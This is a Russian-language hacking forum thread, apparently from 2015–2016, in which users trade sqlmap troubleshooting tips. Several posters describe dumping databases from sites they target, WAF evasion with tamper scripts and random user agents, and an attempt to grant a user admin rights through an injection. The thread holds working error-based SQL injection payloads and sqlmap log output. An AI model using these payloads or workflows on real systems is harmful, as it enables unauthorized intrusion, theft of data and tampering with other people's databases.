Вопросы по SQLMap

Discussion in 'Уязвимости' started by randman, 1 Oct 2015.

  1. Shubka75

    Shubka75 Elder - Старейшина

    Joined:
    24 Sep 2015
    Messages:
    94
    Likes Received:
    57
    Reputations:
    30
    Вот так правильно:
    -------AcunetixBoundary_TFWLMOFXSC
    Content-Disposition: form-data; name="orderby"

    1*
     
  2. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Так тоже пробывал, не получается
     
  3. semik

    semik New Member

    Joined:
    6 Dec 2013
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Никто не сталкивался:
    Сливаю дамп базы мапом. ПОсле слития относительно большой таблицы сохраняет ее, переходит к следующей и пишет, что не может соединиться с хостом или с прокси. После завершает процесс sqlmap.py. Перезапускаю - продолжает нормально. Надоело его пасти. Дамп работает на линуксовом дедике фоново - устал подключаться и перезапускать.
     
  4. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    829
    Likes Received:
    815
    Reputations:
    90
    дебаг надо смотреть
    -v 3
     
    _________________________
  5. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Подскажите как обойти,находит скулю крутит и выбивает
    [WARNING] turning off pre-connect mechanism because of connection ti
    e out(s)
    [00:46:31] [CRITICAL] can't establish SSL connection
    [00:46:31] [WARNING] HTTP error codes detected during run:
    500 (Internal Server Error) - 25 times
     
  6. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    И я туда же))
    Как в sqkmap обойти некий: eicar antivirus test (+различные etag в заголовках)
    P.S>И еще Можно ли указать свой вектор?
     
  7. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    URL encoded GET input was set to \
    То есть нужно поставить символ "\" - как это указать в мапе?
     
  8. Filipp

    Filipp Elder - Старейшина

    Joined:
    10 May 2015
    Messages:
    257
    Likes Received:
    57
    Reputations:
    31
    Пытаюсь напрямую подключиться к MSSQL серверу:
    Code:
    sqlmap -d "mssql://username:pass@ipaddr:1433/tempdb"
    Получаю ошибку
    HTML:
    [16:44:18] [CRITICAL] SQLAlchemy connection issue ('expected string or buffer')
    Руками захожу на ура, тестил метасплоитовские модули, там тоже все работает. Чего тут не так?
     
  9. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Кинь таргет в лс. А не шаблон. Задай coonection string явно.
     
    _________________________
  10. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    Как быстро мапом сдампить бд? кроме --threads?
     
  11. 3acuson

    3acuson Member

    Joined:
    31 Jan 2010
    Messages:
    426
    Likes Received:
    5
    Reputations:
    0
    Народ как sqlmapy указать куда сохранять логи сайтов? а то он всё сюда складирует C:\Documents and Settings\User\.sqlmap\output\ раньше было где стоял туда и сохранял
     
  12. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    --output-dir=OUT.
     
    Duble and 3acuson like this.
  13. ArsenyPro

    ArsenyPro New Member

    Joined:
    30 Apr 2016
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Sqlmapchik (andoid port) после слития примерно 1000 строк вылетает без ошибок не сохраняя ни единой строки. Вылетает из за полного заполнения озу.
    Озу 768 Мб. Свап 512.
    Что можно сделать?
     
  14. kacergei

    kacergei Member

    Joined:
    26 May 2007
    Messages:
    293
    Likes Received:
    89
    Reputations:
    1
    Как сделать sql запрос в sql-shell?
    Делаю такой запрос: UPDATE `db_user` SET `user_group_id` = '1' WHERE `db_user`.`user_id` = 2;
    В таблице db_user пользователю с user_id = 2 установить user_group_id = 1
    В ответ получаю:
    "[WARNING] execution of custom SQL queries is only available when stacked queries are supported"
    Подскажите что не так?
     
  15. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    уязвимость не поддерживает вложенные запросы(stacked queries) а значит писать в базу не получится, только читать,через SELECT
     
    kacergei likes this.
  16. Bobrenz

    Bobrenz New Member

    Joined:
    29 Jul 2015
    Messages:
    25
    Likes Received:
    2
    Reputations:
    0
    уважаемые, все хотел спросить, а можно разделитель сменить ну к примеру на : при сливе бд или что бы он был по дефолту
     
  17. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    [09:53:38] [INFO] testing MySQL
    [09:53:38] [INFO] confirming MySQL
    [09:53:38] [INFO] the back-end DBMS is MySQL
    web application technology: PHP 5.3.29, Apache 2.2.24
    back-end DBMS: MySQL >= 5.0.0
    [09:53:38] [INFO] fetching database names
    [09:54:08] [WARNING] turning off pre-connect mechanism because of connection tim
    e out(s)
    [09:54:08] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [09:54:08] [WARNING] if the problem persists please try to lower the number of u
    sed threads (option '--threads')
    [09:54:08] [CRITICAL] connection dropped or unknown HTTP status code received

    и так раз 50,что можно сделать?


    [11:35:19] [INFO] fetching database names
    [11:35:19] [PAYLOAD] '||(sElECt/**/'nMok'/**/fRoM/**/duAl/**/WHeRE/**/6034=6034/
    **/aNd/**/(sElECt/**/2*(If((sElECt/**/*/**/fRoM/**/(sElECt/**/CoNCaT(0x7178717a7
    1,(sElECt/**/cOUNt(schema_name)/**/fRoM/**/INFORMATION_SCHEMA.SCHEMATA),0x717878
    7671,0x78))s),/**/8446744073709551610,/**/8446744073709551610))))||'
    [11:35:49] [WARNING] turning off pre-connect mechanism because of connection tim
    e out(s)
    [11:35:49] [CRITICAL] connection timed out to the target URL. sqlmap is going to
    retry the request(s)
    [11:35:49] [WARNING] if the problem persists please try to lower the number of u
    sed threads (option '--threads')
    [11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm
    ap is going to retry the request
    [11:35:49] [DEBUG] connection dropped or unknown HTTP status code received. sqlm
    ap is going to retry the request
    [11:35:49] [CRITICAL] connection dropped or unknown HTTP status code received
    [11:35:49] [WARNING] HTTP error codes detected during run:
    404 (Not Found) - 1 times
    [11:35:49] [DEBUG] too many 4xx and/or 5xx HTTP error codes could mean that some
    kind of protection is involved (e.g. WAF)
     
    #197 .Light., 20 Aug 2016
    Last edited: 20 Aug 2016
  18. .Light.

    .Light. Member

    Joined:
    12 Jul 2010
    Messages:
    195
    Likes Received:
    5
    Reputations:
    0
    -v 3 --dbs --random-agent --safe-url=2 --safe-freq=3 --skip-urlencode --tamper="informationschemacomment.py" --hex


    [20:30:02] [INFO] retrieved:
    [20:30:02] [DEBUG] performed 5 queries in 11.82 seconds
    [20:30:02] [ERROR] unable to retrieve the number of databases
    [20:30:02] [INFO] falling back to current database
    [20:30:02] [INFO] fetching current database
    [20:30:02] [PAYLOAD] ' OR (SELECT 2*(IF((SELECT * FROM (SELECT CONCAT(0x71786b78
    71,(MID((HEX(IFNULL(CAST(DATABASE() AS CHAR),0x20))),1,451)),0x716b6b7671,0x78))
    s), 8446744073709551610, 8446744073709551610))) AND 'xzbL' LIKE 'xzbL
    [20:30:04] [DEBUG] performed 1 queries in 1.23 seconds
    [20:30:04] [CRITICAL] unable to retrieve the database names

    Помогите плз
     
  19. bustudo

    bustudo New Member

    Joined:
    18 Aug 2016
    Messages:
    14
    Likes Received:
    0
    Reputations:
    0
    добрый день всем, случилось так что похерил сессию скульмапа в которой нашел точки входа данных, сессию не могу восстановить, как указать данные из предыдущей сессии ?
    сами данные:
    sqlmap resumed the following injection point(s) from stored session:
    ---
    Parameter: lang (GET)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: lang=rus WHERE 1413=1413 AND (SELECT 4533 FROM(SELECT COUNT(*),CONCAT(0x71627a6a71,(SELECT (ELT(4533=4533,1))),0x71716b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)-- LOyR
    Vector: AND (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
     
  20. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    они физичиски хранятся, если вы сменили ОС, пк, или была удалена та самая папка, то востановление, или никак.